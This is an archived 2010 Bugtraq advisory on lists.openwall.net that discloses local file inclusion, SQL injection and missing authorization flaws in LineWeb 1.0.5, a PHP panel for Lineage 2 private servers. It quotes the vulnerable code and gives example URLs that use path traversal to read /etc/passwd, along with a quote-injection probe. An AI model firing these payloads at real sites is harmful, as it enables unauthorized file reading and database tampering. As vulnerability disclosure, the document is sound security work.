lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20100105091406.11008.qmail@securityfocus.com>
Date: 5 Jan 2010 09:14:06 -0000
From: ign.sec@...il.com
To: bugtraq@...urityfocus.com
Subject: Multiple vulnerabilities in LineWeb 1.0.5

LineWeb it's a web-app to manage Lineage 2 private severs, a very known mmorpg, and allows to do action such as:

Main Features:
- Register
- Login
- Quick Login Function
- Quick statistics function (server status, game server status, online players)
- Statistics (login server status, game server status, players online, total accounts, total characters, total gm characters, total clans)

Administrator Features:
- (NEW) New administrator skin
- (NEW) New server settings (Edit server settings, server rates, specs etc)
- (NEW) New website settings (Title, Note from the management, Contact Email, Rankings Limit)
- (NEW) Ads Management (Add, Edit & Delete)
- News management (add, edit & delete)
- Download management (add, edit & delete)
- Login
- Add administrator
- Logout (of course)

Member Panel Features:
- Automaticly views all your current characters when you login (name, level, kills etc)
- Change account password
- Delete account
- Logout


Live Demo Front : http://demo.l2web.org/
Live Demo Admin : http://demo.l2web.org/admin/

Demo Administrator Login:
user : demo
password : demo123


LFI:

We can found this part of code on index.php

<?php
	if (isset($_GET['op']))
	{
		{
		$op = "modules/" . $_GET['op'] . ".php";
		}
		if(!file_exists($op)) $op = "error.php";
	} else $op = "main.php";
	// include the page specified in the browser address field:
	include($op);
?>


Wich allows us to include local files on index.php by using the $op variable, IE: http://localhost/Lineage ACM/lineweb_1.0.5/index.php?op=../../../../../../../etc/passwd


We also can find this vuln. in /admin/index.php, IE:
http://localhost/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=../../../../../../../etc/passwd

**************************************************

Strange behavior on op=register:

If we register a username twice, IE: username=o&password=12345&confirmpassword=12345&email=&submit2=Register
We get: 
The username already exists.

But if we send a long string twice, IE:
username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaao&password=12345&confirmpassword=12345&email=&submit2=Register

We get:
Duplicate entry 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' for key 'PRIMARY'



¿SQL Injection?

In admin/edit_news.php we can find this source:

65 elseif(isset($_GET['newsid']))
66      {
67 
68      $result = mysql_query("SELECT * FROM news WHERE newsid='" . $_GET['newsid'] . "'");
69         while($myrow = mysql_fetch_array($result))
70     {
71

We can observe that it doesn't make any check at all any input that we make on $newsid, so if we inject a " ' " in:
http://localhost/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27
We get:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\wamp\www\Lineage ACM\lineweb_1.0.5\admin\edit_news.php on line 69
We can find this vuln in:  edit_news.php ; edit_downloads.php y edit_ads.php. 
It requires magic_quotes = OFF

**************************************************

Edit without permission:

edit_downloads.php allows us to edit any download link, without any verification at all. By doing this, we could trick the user to download an infected file.

The same happens on edit_ads.php,  if we give to our URL values to ad_name y ad_content, we could get without any verification, permission to edit news:
http://localhost/Lineage%20ACM/lineweb_1.0.5/admin/edit_ads.php?ad_id=1&ad_name=a&ad_content=ARGENTINA

By doing this we could make a HTML, XSS or CSS injection.

Ignacio Garrido,

Argentina.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ